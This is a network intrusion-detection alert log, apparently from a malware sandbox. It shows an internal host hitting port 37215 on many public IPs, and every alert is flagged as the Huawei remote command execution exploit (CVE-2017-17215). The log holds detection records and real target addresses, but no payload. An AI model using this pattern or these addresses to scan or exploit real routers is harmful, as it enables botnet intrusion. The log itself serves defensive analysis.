                                                    07/10/24-08:27:17.071295TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5626437215192.168.2.14151.51.23.52
                                                    07/10/24-08:26:43.885444TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4140637215192.168.2.14157.178.102.230
                                                    07/10/24-08:26:25.429135TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4912837215192.168.2.14197.182.239.109
                                                    07/10/24-08:26:41.483728TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5009037215192.168.2.14197.24.79.180
                                                    07/10/24-08:26:52.018134TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4554437215192.168.2.14157.193.182.254
                                                    07/10/24-08:27:32.619838TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4922437215192.168.2.1441.80.66.11
                                                    07/10/24-08:26:38.627693TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5981437215192.168.2.1473.126.42.198
                                                    07/10/24-08:26:26.528508TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5314837215192.168.2.1441.84.239.20
                                                    07/10/24-08:26:26.557067TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5003437215192.168.2.14186.72.251.155
                                                    07/10/24-08:26:29.810736TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6018837215192.168.2.1441.43.175.42
                                                    07/10/24-08:26:18.018737TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3993037215192.168.2.1441.113.226.188
                                                    07/10/24-08:27:07.344618TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4528637215192.168.2.14197.154.113.135
                                                    07/10/24-08:27:14.835457TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5443237215192.168.2.14157.165.218.182
                                                    07/10/24-08:26:38.624887TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4804437215192.168.2.1413.117.80.167
                                                    07/10/24-08:26:43.526771TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5184037215192.168.2.14157.99.102.235
                                                    07/10/24-08:27:19.312815TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4105837215192.168.2.14136.168.22.40
                                                    07/10/24-08:27:13.761850TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4677037215192.168.2.1441.112.7.81
                                                    07/10/24-08:26:11.624823TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4320637215192.168.2.14144.199.200.170
                                                    07/10/24-08:26:13.778157TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3349037215192.168.2.14218.144.238.52
                                                    07/10/24-08:27:07.363074TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5204637215192.168.2.14197.87.255.30
                                                    07/10/24-08:26:25.468453TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4589837215192.168.2.14197.34.140.132
                                                    07/10/24-08:26:28.841880TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3930837215192.168.2.1441.233.248.230
                                                    07/10/24-08:26:29.863602TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4341637215192.168.2.1441.216.98.127
                                                    07/10/24-08:27:14.885760TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4627637215192.168.2.14157.90.49.172
                                                    07/10/24-08:27:31.547528TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5172837215192.168.2.14197.170.209.13
                                                    07/10/24-08:27:33.904086TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4214637215192.168.2.14197.75.249.1
                                                    07/10/24-08:26:11.617783TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5471837215192.168.2.14197.70.178.22
                                                    07/10/24-08:27:27.053568TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3615237215192.168.2.1441.46.174.254
                                                    07/10/24-08:26:49.911247TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3650837215192.168.2.1441.208.64.80
                                                    07/10/24-08:26:36.381629TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5708837215192.168.2.1441.205.95.204
                                                    07/10/24-08:27:22.903696TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4416637215192.168.2.14157.36.154.238
                                                    07/10/24-08:26:17.950473TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4999237215192.168.2.14197.23.198.169
                                                    07/10/24-08:26:23.279248TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5255837215192.168.2.14197.20.81.84
                                                    07/10/24-08:27:07.384397TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3579637215192.168.2.14197.65.39.43
                                                    07/10/24-08:26:11.530155TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4741637215192.168.2.14152.57.176.37
                                                    07/10/24-08:27:33.744458TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5263437215192.168.2.14157.142.218.255
                                                    07/10/24-08:27:05.214237TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5101637215192.168.2.148.85.176.76
                                                    07/10/24-08:26:22.256237TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5662037215192.168.2.1441.98.196.196
                                                    07/10/24-08:26:23.350374TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3597037215192.168.2.14149.134.213.25
                                                    07/10/24-08:26:48.002709TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4555037215192.168.2.1441.175.68.63
                                                    07/10/24-08:26:31.093186TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3419837215192.168.2.1441.84.145.208
                                                    07/10/24-08:26:22.234454TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4733837215192.168.2.1447.181.185.114
                                                    07/10/24-08:26:28.866778TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5873237215192.168.2.14172.238.18.26
                                                    07/10/24-08:26:34.264722TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4940437215192.168.2.14197.82.63.213
                                                    07/10/24-08:26:43.922167TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5164237215192.168.2.14145.250.187.196
                                                    07/10/24-08:27:23.969982TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3313437215192.168.2.1441.165.56.164
                                                    07/10/24-08:27:14.026878TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5395037215192.168.2.14157.153.68.134
                                                    07/10/24-08:26:14.771626TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5572637215192.168.2.14157.94.20.208
                                                    07/10/24-08:26:25.453376TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5416037215192.168.2.14157.242.175.51
                                                    07/10/24-08:26:52.078172TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3995637215192.168.2.14157.169.68.228
                                                    07/10/24-08:27:32.581630TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4562637215192.168.2.14197.114.253.177
                                                    07/10/24-08:26:59.771791TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4463037215192.168.2.1441.71.208.243
                                                    07/10/24-08:27:02.868387TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6014637215192.168.2.1441.125.140.15
                                                    07/10/24-08:26:23.348963TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4728237215192.168.2.14157.187.102.36
                                                    07/10/24-08:26:28.873311TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3893837215192.168.2.14157.164.166.194
                                                    07/10/24-08:27:02.883377TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4052237215192.168.2.1441.143.34.241
                                                    07/10/24-08:27:08.366132TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5153437215192.168.2.14157.222.112.220
                                                    07/10/24-08:27:17.107652TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5850637215192.168.2.14197.32.68.236
                                                    07/10/24-08:26:41.494208TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3636437215192.168.2.14197.88.57.166
                                                    07/10/24-08:27:17.102035TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5669037215192.168.2.14197.131.128.21
                                                    07/10/24-08:26:55.366759TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4136837215192.168.2.14197.43.4.240
                                                    07/10/24-08:26:59.686618TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4564837215192.168.2.14157.111.128.250
                                                    07/10/24-08:26:33.156577TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6017237215192.168.2.1452.61.239.85
                                                    07/10/24-08:27:02.981155TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5583037215192.168.2.14157.21.214.122
                                                    07/10/24-08:27:13.905165TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4670037215192.168.2.14197.46.75.65
                                                    07/10/24-08:27:19.253247TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3889837215192.168.2.14197.16.95.207
                                                    07/10/24-08:27:30.561465TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4658237215192.168.2.14157.237.49.144
                                                    07/10/24-08:27:19.322147TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5714437215192.168.2.14197.53.105.240
                                                    07/10/24-08:26:13.780678TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4016637215192.168.2.14157.27.79.255
                                                    07/10/24-08:27:02.928138TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3277437215192.168.2.14157.184.185.27
                                                    07/10/24-08:26:14.623181TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5786837215192.168.2.14210.39.66.100
                                                    07/10/24-08:27:14.845795TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4004437215192.168.2.14157.0.153.148
                                                    07/10/24-08:26:47.941431TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5609637215192.168.2.14197.140.43.114
                                                    07/10/24-08:26:52.028986TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3720437215192.168.2.14197.184.197.233
                                                    07/10/24-08:26:13.849175TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5677437215192.168.2.14197.10.42.115
                                                    07/10/24-08:27:02.710237TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4546837215192.168.2.1441.211.103.248
                                                    07/10/24-08:27:22.922024TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3536637215192.168.2.14157.101.176.177
                                                    07/10/24-08:26:55.438982TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6057037215192.168.2.1441.33.177.157
                                                    07/10/24-08:26:51.986652TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4980037215192.168.2.1438.158.153.9
                                                    07/10/24-08:26:57.561503TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4886037215192.168.2.1441.177.66.181
                                                    07/10/24-08:27:07.381447TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4512837215192.168.2.14197.48.85.25
                                                    07/10/24-08:27:24.883721TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5327437215192.168.2.1441.89.203.104
                                                    07/10/24-08:27:31.562174TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3575237215192.168.2.1441.119.215.253
                                                    07/10/24-08:27:33.768377TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5670237215192.168.2.14197.219.111.94
                                                    07/10/24-08:26:26.600154TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4685237215192.168.2.1441.15.122.193
                                                    07/10/24-08:27:17.018335TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6045437215192.168.2.14197.98.167.183
                                                    07/10/24-08:26:28.723729TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5895637215192.168.2.14157.135.53.218
                                                    07/10/24-08:26:43.721021TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4866037215192.168.2.14143.59.66.128
                                                    07/10/24-08:26:38.518118TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3699837215192.168.2.14157.57.108.16
                                                    07/10/24-08:27:02.859176TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5408437215192.168.2.14157.121.72.226
                                                    07/10/24-08:27:19.174842TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3641437215192.168.2.14207.92.180.213
                                                    07/10/24-08:27:27.099101TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5283637215192.168.2.14157.136.49.217
                                                    07/10/24-08:27:31.550771TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3569437215192.168.2.14197.176.1.105
                                                    07/10/24-08:26:42.427094TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4633037215192.168.2.1441.168.192.18
                                                    07/10/24-08:26:34.212749TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5618837215192.168.2.1441.177.174.226
                                                    07/10/24-08:26:22.272664TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4102837215192.168.2.1477.45.246.95
                                                    07/10/24-08:26:38.630807TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5093837215192.168.2.14197.17.155.89
                                                    07/10/24-08:26:11.542221TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5212237215192.168.2.14193.130.43.8
                                                    07/10/24-08:26:48.013030TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4942037215192.168.2.1437.68.78.18
                                                    07/10/24-08:27:30.519410TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3292837215192.168.2.1482.73.17.96
                                                    07/10/24-08:26:17.959053TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3384437215192.168.2.1441.251.150.134
                                                    07/10/24-08:27:20.483733TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3468837215192.168.2.14197.186.254.177
                                                    07/10/24-08:27:07.333954TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5984237215192.168.2.14139.80.145.175
                                                    07/10/24-08:26:49.859593TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4840037215192.168.2.1495.108.150.28
                                                    07/10/24-08:26:33.220659TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4333837215192.168.2.1441.242.176.238
                                                    07/10/24-08:27:07.369689TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4964637215192.168.2.14150.118.243.115
                                                    07/10/24-08:27:32.610394TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4933437215192.168.2.14157.71.77.4
                                                    07/10/24-08:27:31.459997TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3658837215192.168.2.14157.181.230.196
                                                    07/10/24-08:26:11.493465TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4067637215192.168.2.1414.126.26.250
                                                    07/10/24-08:26:20.143490TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5001237215192.168.2.14157.9.96.190
                                                    07/10/24-08:26:20.158539TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3569837215192.168.2.14157.124.16.213
                                                    07/10/24-08:26:15.764270TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4530037215192.168.2.1441.117.125.191
                                                    07/10/24-08:27:20.412517TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3712037215192.168.2.14197.128.160.139
                                                    07/10/24-08:26:47.739348TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4521037215192.168.2.1441.244.75.45
                                                    07/10/24-08:26:55.395461TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4079237215192.168.2.14197.114.8.17
                                                    07/10/24-08:26:13.803264TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4869637215192.168.2.14137.185.141.155
                                                    07/10/24-08:27:11.514897TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5744237215192.168.2.14197.182.101.182
                                                    07/10/24-08:27:28.139663TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5867237215192.168.2.1441.89.177.56
                                                    07/10/24-08:27:13.728066TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3374037215192.168.2.1441.207.235.106
                                                    07/10/24-08:27:30.478921TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3386637215192.168.2.1441.111.69.65
                                                    07/10/24-08:27:07.356650TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5099437215192.168.2.14197.166.206.95
                                                    07/10/24-08:26:55.398753TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4493237215192.168.2.14157.225.117.104
                                                    07/10/24-08:27:17.070374TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4338637215192.168.2.1441.218.50.148
                                                    07/10/24-08:26:55.433645TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4468637215192.168.2.14157.75.202.43
                                                    07/10/24-08:27:24.970396TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4986237215192.168.2.1441.101.108.56
                                                    07/10/24-08:26:15.857451TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5224037215192.168.2.14202.80.64.188
                                                    07/10/24-08:26:31.069950TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5781837215192.168.2.14157.86.157.103
                                                    07/10/24-08:26:31.081032TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4647037215192.168.2.1441.26.164.95
                                                    07/10/24-08:26:43.873718TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4109037215192.168.2.1441.65.3.245
                                                    07/10/24-08:26:45.594694TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5566837215192.168.2.1441.132.83.200
                                                    07/10/24-08:27:14.830052TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5027037215192.168.2.1441.119.32.222
                                                    07/10/24-08:26:52.028986TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4971437215192.168.2.1442.201.126.146
                                                    07/10/24-08:27:10.772266TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4134837215192.168.2.14157.155.153.12
                                                    07/10/24-08:26:20.139593TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4131037215192.168.2.14156.164.211.96
                                                    07/10/24-08:27:27.139114TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4064037215192.168.2.14197.188.40.23
                                                    07/10/24-08:27:34.117875TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4514837215192.168.2.1441.8.176.60
                                                    07/10/24-08:26:13.778157TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3757037215192.168.2.14197.204.104.14
                                                    07/10/24-08:26:28.624791TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5267037215192.168.2.14197.27.27.152
                                                    07/10/24-08:26:13.772861TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3458837215192.168.2.14157.37.60.52
                                                    07/10/24-08:26:43.728156TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4894437215192.168.2.14159.146.34.188
                                                    07/10/24-08:27:10.530292TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5734237215192.168.2.14197.155.248.90
                                                    07/10/24-08:26:42.161476TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3310237215192.168.2.14157.183.116.73
                                                    07/10/24-08:27:02.899276TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5222437215192.168.2.14193.4.84.235
                                                    07/10/24-08:27:05.159801TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3448637215192.168.2.14197.152.225.222
                                                    07/10/24-08:27:17.096498TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5016037215192.168.2.1441.237.252.239
                                                    07/10/24-08:26:43.574763TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5229037215192.168.2.14216.72.196.123
                                                    07/10/24-08:27:23.948624TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4341837215192.168.2.1484.98.221.218
                                                    07/10/24-08:26:14.623309TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4115037215192.168.2.14157.195.182.4
                                                    07/10/24-08:26:52.035646TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3330837215192.168.2.1441.169.134.75
                                                    07/10/24-08:27:02.973887TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5981637215192.168.2.14157.227.123.31
                                                    07/10/24-08:27:19.328472TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5345037215192.168.2.14172.222.254.71
                                                    07/10/24-08:27:05.128414TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4530237215192.168.2.14197.224.89.230
                                                    07/10/24-08:26:47.856770TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3712237215192.168.2.1441.20.166.7
                                                    07/10/24-08:27:11.522078TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3368237215192.168.2.14157.175.68.237
                                                    07/10/24-08:26:13.671571TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5892437215192.168.2.1494.88.202.208
                                                    07/10/24-08:27:19.299032TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4641237215192.168.2.1441.136.243.210
                                                    07/10/24-08:27:32.513805TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4467237215192.168.2.14157.155.65.133
                                                    07/10/24-08:26:14.829275TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5094437215192.168.2.14116.30.65.113
                                                    07/10/24-08:27:27.164034TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5789637215192.168.2.14157.173.126.71
                                                    07/10/24-08:27:33.894187TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5716237215192.168.2.1441.193.110.62
                                                    07/10/24-08:26:17.962060TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3683837215192.168.2.14197.10.211.211
                                                    07/10/24-08:26:22.290306TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4269037215192.168.2.14197.252.37.14
                                                    07/10/24-08:27:07.259600TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4599637215192.168.2.14157.195.73.0
                                                    07/10/24-08:26:26.526519TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3829637215192.168.2.14157.36.52.201
                                                    07/10/24-08:26:43.842047TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3741437215192.168.2.14197.79.138.13
                                                    07/10/24-08:27:32.584145TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3579037215192.168.2.1441.189.99.227
                                                    07/10/24-08:26:14.755062TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4294837215192.168.2.14157.204.251.22
                                                    07/10/24-08:26:43.779855TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4070437215192.168.2.14197.208.128.124
                                                    07/10/24-08:27:28.134623TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5241837215192.168.2.1480.87.68.206
                                                    07/10/24-08:26:28.647124TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4544837215192.168.2.14157.242.231.198
                                                    07/10/24-08:26:31.053322TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4092637215192.168.2.1441.225.209.138
                                                    07/10/24-08:27:02.692447TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4517037215192.168.2.14157.140.35.184
                                                    07/10/24-08:27:17.048975TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5643037215192.168.2.14197.73.55.139
                                                    07/10/24-08:26:34.216588TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4995237215192.168.2.14197.56.86.151
                                                    07/10/24-08:26:59.822486TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5842037215192.168.2.1441.165.70.170
                                                    07/10/24-08:27:33.913856TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3783837215192.168.2.14157.4.3.3
                                                    07/10/24-08:26:47.851082TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4694837215192.168.2.1441.12.65.134
                                                    07/10/24-08:26:55.268885TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4668237215192.168.2.14197.250.255.62
                                                    07/10/24-08:26:11.176573TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3370037215192.168.2.1483.156.17.59
                                                    07/10/24-08:27:19.294744TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4228637215192.168.2.1441.129.191.196
                                                    07/10/24-08:26:41.551602TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4830237215192.168.2.14193.96.235.189
                                                    07/10/24-08:27:05.116330TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5591437215192.168.2.1441.137.205.4
                                                    07/10/24-08:26:42.432411TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4473037215192.168.2.14157.19.223.198
                                                    07/10/24-08:27:14.837323TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4986437215192.168.2.14157.204.184.122
                                                    07/10/24-08:26:11.120282TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4860437215192.168.2.14125.39.64.172
                                                    07/10/24-08:26:43.610396TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3906837215192.168.2.1441.116.44.79
